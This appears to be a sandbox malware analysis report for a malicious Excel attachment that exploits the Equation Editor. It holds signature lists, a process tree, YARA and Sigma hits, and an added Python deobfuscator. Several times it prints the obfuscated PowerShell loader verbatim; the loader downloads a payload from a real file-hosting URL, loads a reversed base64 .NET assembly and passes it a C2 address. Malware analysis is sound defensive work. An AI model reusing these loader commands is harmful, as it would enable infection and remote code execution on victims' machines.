
Windows Analysis Report
Pedido No 4500924462.xls

Overview

General Information

Sample name: Pedido No 4500924462.xls
Analysis ID: 1563998
MD5: 456ff43e8b42a2043afc83c4474872d5
SHA1: a18cb477550dc4eda2e5f0d22b2ffb5a71dbeb13
SHA256: ae99e5fea931ceed4641e248fc8f06fb314d4c12111b92871e6bf45c69d93188
Tags: xls, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3208 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 3472 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3812 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3880 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhKZjVpbWFnZUJ5dCcrJ2VzKTtKZjVzdGFydEZsYWcgPSA3WmE8PEJBU0U2NF9TVEFSVD4nKyc+N1phO0pmNWVuZEZsYWcgJysnPSA3WmE8PEJBU0U2NF9FTkQ+PjdaYTtKZjVzdGFydEluZGV4ID0gSmY1aW1hZ2VUZXh0JysnLkluZGV4T2YoSmY1c3RhcnRGbGFnKTtKZjVlbmRJbmRleCA9IEpmNWltYWdlVGV4dC5JbmRleE9mKEonKydmNWVuZEZsYWcpO0pmNXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBKZjVlbmRJbmQnKydleCAtZ3QgSmY1c3RhcnRJbmRleDtKZjVzdGFydEluZGV4ICs9IEpmNXN0YXJ0RmxhZy5MZW5ndCcrJ2g7SmY1YmFzZTY0TGVuZ3RoID0gSmYnKyc1ZW5kSW5kZXggLSBKZjUnKydzdGFydEluZCcrJ2V4O0pmNWJhc2U2NENvbW1hbmQgPScrJyBKZjUnKydpbWFnZVRleHQuU3Vic3RyaW5nKEpmNXN0YXJ0SW5kZXgsIEpmNWJhJysnc2U2NExlbmd0aCk7SmY1YmFzZTYnKyc0UmV2ZXJzZWQgPSAtaicrJ29pbiAoSmY1YmFzZTYnKyc0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFFHMCBGb3JFYWNoLU9iamVjdCcrJyB7IEpmNV8gfSlbLTEuLi0oSmY1JysnYmFzJysnZTY0Q29tbWFuZC5MZW5ndGgpXTtKZjVjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKEpmNWJhc2U2NFJldmVyc2VkKTtKZjVsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoSmY1Y29tbWFuZEJ5dGVzKTtKZjV2YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDdaYVZBSTdaYSk7SmY1dmFpTWV0aG9kLkludm9rZShKZjVudWxsLCBAKDdaYXR4dC5SVENDQ1JWLzYyMi81MTIuODIxLjU5LjMyLy86cCcrJ3R0aDdaYSwgN1phZGVzYXRpdmFkbzdaYSwgN1phZGVzYXQnKydpdmFkbzdaYSwgN1phZGVzYXRpdicrJ2FkbzdaYSwgN1phYXMnKydwbmUnKyd0X2NvbXBpbGVyN1phLCA3WmFkZXNhdGl2YWRvN1phLCA3WmFkZXNhdGl2YWRvN1phLDdaJysnYWRlc2F0aXZhZCcrJ283WmEsN1phJysnZGVzYXQnKydpdmFkbzdaYSw3WmFkZXNhJysnd
Gl2YWRvN1phLDdaYWRlc2F0aXZhZG83WmEsN1phZGVzYXRpdmEnKydkbzdaYSw3WmExN1phLDdaYWRlc2F0aXZhZG83WmEpKTsnKS5SRVBsQWNlKCdKZjUnLFtTdHJpTkddW0NoQVJdMzYpLlJFUGxBY2UoJzdaYScsW1N0cmlOR11bQ2hBUl0zOSkuUkVQbEFjZSgoW0NoQVJdODErW0NoQVJdNzErW0NoQVJdNDgpLFtTdHJpTkddW0NoQVJdMTI0KSB8IC4oICRwc2hPbUVbMjFdKyRwU0hPbWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 4024 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
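The two powershell.exe entries in the tree show the loader's obfuscation layers side by side: the parent (PID 3924) carries the script base64-encoded in $Codigo; the decoded child command (PID 4024) is one single-quoted text in which every $ was written as Jf5, every ' as 7Za and the pipe as QG0, chopped into '+'-joined fragments and restored by three .REPlAce() calls; the result is handed to Invoke-Expression spelled as $pshOmE[21]+$pSHOme[30]+'x', i.e. the letters i and e indexed out of $PSHOME. The first argument passed to the loaded assembly's VAI method is additionally stored reversed. The Python below is an added illustration, not part of the Joe Sandbox report: it strips those layers from excerpts of the two command lines without running any PowerShell. The base64 is cut to its first 96 characters and the inner script to a handful of its fragments (both marked as excerpts in the code); the replacement order, character codes and $PSHOME indices are taken from the command line, everything else is the example's own. Reversing the VAI argument gives an http URL on 23.95.128.215, the host that EQNEDT32.EXE contacts on port 80 in the network events further down.

```python
import base64
import re

# Excerpts copied from the two powershell.exe command lines in the process tree above.
# CODIGO_PREFIX is the first 96 base64 characters of $Codigo (PID 3924); INNER is the
# child command (PID 4024) with most of its middle fragments cut out to keep the
# sample short. Both are excerpts, not the complete strings.
CODIGO_PREFIX = (
    "KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScr"
    "J3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9"
)
INNER = (
    "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'"
    "+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true"
    "&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'"
    "+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5base6'"
    "+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'"
    "+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5loadedAssembly = [System.Reflection.Assembly'"
    "+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);"
    "Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, "
    "7Zaas'+'pne'+'t_compiler7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39)"
    ".REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')"
)

# $PSHOME on a 64-bit Windows 7 host (assumed). The SysWOW64 path used by the 32-bit
# powershell.exe in the report has the same length, so the indices land on the same letters.
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"

_TOKEN = re.compile(r"'([^']*)'|\[char\](\d+)", re.I)


def ps_string(expr: str) -> str:
    """Evaluate a PowerShell expression made only of 'literals', [ChAR]n, [StriNG]
    casts, + and parentheses, without running PowerShell."""
    return "".join(chr(int(code)) if code else lit for lit, code in _TOKEN.findall(expr))


def decode_outer(codigo_b64: str) -> str:
    """Layer 1: $Codigo is plain base64 of the UTF-8 inner script."""
    return base64.b64decode(codigo_b64).decode("utf-8")


def split_layers(inner: str):
    """Split "('...'+'...').REPlAce(...)... | .( ... )" into the quoted body expression,
    the ordered (from, to) replacement pairs and the invoker expression."""
    m = re.search(r"'\)\s*\.replace\(", inner, re.I)
    if not m:
        raise ValueError("no .Replace() chain after the quoted body")
    close = m.start() + 1                  # index of the ')' that ends the body
    body_expr, chain = inner[1:close], inner[close + 1:]
    replacements = [
        (ps_string(src), ps_string(dst))
        for src, dst in re.findall(r"\.replace\(\s*(\(?[^,]*?\)?)\s*,\s*([^)]*)\)", chain, re.I)
    ]
    inv = re.search(r"\|\s*\.\(\s*(.*?)\s*\)\s*$", chain)
    return body_expr, replacements, (inv.group(1) if inv else "")


def resolve_invoker(expr: str, pshome: str = PSHOME) -> str:
    """Layer 2c: $pshOmE[21]+$pSHOme[30]+'x' spells a cmdlet from characters of $PSHOME."""
    literal = re.sub(r"\$pshome\[(\d+)\]", lambda m: "'" + pshome[int(m.group(1))] + "'", expr, flags=re.I)
    return ps_string(literal)


def deobfuscate(inner: str, pshome: str = PSHOME) -> dict:
    body_expr, replacements, invoker_expr = split_layers(inner)
    script = ps_string(body_expr)          # Layer 2a: join the '+'-split fragments
    for src, dst in replacements:          # Layer 2b: restore $, ' and | in chain order
        script = script.replace(src, dst)
    vai = re.search(r"\.Invoke\(\$null,\s*@\((.*?)\)\)", script)
    vai_args = [ps_string(a) for a in vai.group(1).split(",")] if vai else []
    return {
        "replacements": replacements,
        "invoker": resolve_invoker(invoker_expr, pshome),
        "script": script,
        "vai_args": vai_args,
        # Layer 3: the first argument handed to dnlib.IO.Home.VAI is stored reversed.
        "c2_url": vai_args[0][::-1] if vai_args else None,
    }


if __name__ == "__main__":
    assert INNER.startswith(decode_outer(CODIGO_PREFIX))   # layer 1 agrees with the child command
    result = deobfuscate(INNER)
    print("invoker :", result["invoker"])
    print("c2 url  :", result["c2_url"])
    print("script  :", result["script"])
```

One evaluator, ps_string(), serves both the '+' concatenation of the body and the [ChAR]n arguments of the .REPlAce() calls, because in both places the obfuscator only ever builds strings from literals and character codes; the only PowerShell semantics the script needs is that the method chain applies left to right. When analysing a sample from another host, pass that host's real $PSHOME value to resolve_invoker(), since a different install path changes which characters the indices select.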
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestof[1].doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen
  • 0x146d:$obj2: \objdata
  • 0x1453:$obj3: \objupdate
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7AFCBA1.doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen
  • 0x146d:$obj2: \objdata
  • 0x1453:$obj3: \objupdate
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 3924 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x47036:$b2: ::FromBase64String(
  • 0x4769c:$b2: ::FromBase64String(
  • 0x480ff:$b2: ::FromBase64String(
  • 0x492e3:$b2: ::FromBase64String(
  • 0x49a43:$b2: ::FromBase64String(
  • 0x4a33f:$b2: ::FromBase64String(
  • 0x4aa24:$b2: ::FromBase64String(
  • 0x11ad3e:$b2: ::FromBase64String(
  • 0x23b26:$b3: ::UTF8.GetString(
  • 0x244b7:$b3: ::UTF8.GetString(
  • 0x25035:$b3: ::UTF8.GetString(
  • 0x25b87:$b3: ::UTF8.GetString(
  • 0x43a1b:$b3: ::UTF8.GetString(
  • 0x46dc6:$b3: ::UTF8.GetString(
  • 0x4742c:$b3: ::UTF8.GetString(
  • 0x47e8f:$b3: ::UTF8.GetString(
  • 0x49073:$b3: ::UTF8.GetString(
  • 0x497d3:$b3: ::UTF8.GetString(
  • 0x4a0cf:$b3: ::UTF8.GetString(
  • 0x4a7b4:$b3: ::UTF8.GetString(
  • 0x50216:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 4024 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
    Process Memory Space: powershell.exe PID: 4024 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
    • 0x337c8:$b2: ::FromBase64String(
    • 0x5491a:$b2: ::FromBase64String(
    • 0x54ff4:$b2: ::FromBase64String(
    • 0x56777:$b2: ::FromBase64String(
    • 0x5827c:$b2: ::FromBase64String(
    • 0x58956:$b2: ::FromBase64String(
    • 0xcfaff:$b2: ::FromBase64String(
    • 0xd01d0:$b2: ::FromBase64String(
    • 0xd4d8b:$b2: ::FromBase64String(
    • 0xd5c3f:$b2: ::FromBase64String(
    • 0xee8d3:$b2: ::FromBase64String(
    • 0x10e40e:$b2: ::FromBase64String(
    • 0x159327:$b2: ::FromBase64String(
    • 0x159a00:$b2: ::FromBase64String(
    • 0x15f740:$b2: ::FromBase64String(
    • 0x175d52:$b2: ::FromBase64String(
    • 0x18e8a7:$b2: ::FromBase64String(
    • 0x1b7fa1:$b2: ::FromBase64String(
    • 0x1b8f6f:$b2: ::FromBase64String(
    • 0x1ba7c3:$b2: ::FromBase64String(
    • 0x1d8c8f:$b2: ::FromBase64String(

    Exploits

    Source: Network Connection; Author: Joe Security; Data: DestinationIp: 23.95.128.215, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3812, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49174
    Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3812, TargetFilename: C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs

    System Summary

    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBb
    Source: Network Connection; Author: Max Altgelt (Nextron Systems); Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49174, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3812, Protocol: tcp, SourceIp: 23.95.128.215, SourceIsIpv6: false, SourcePort: 80
    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 
7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5co
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden 
-executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ 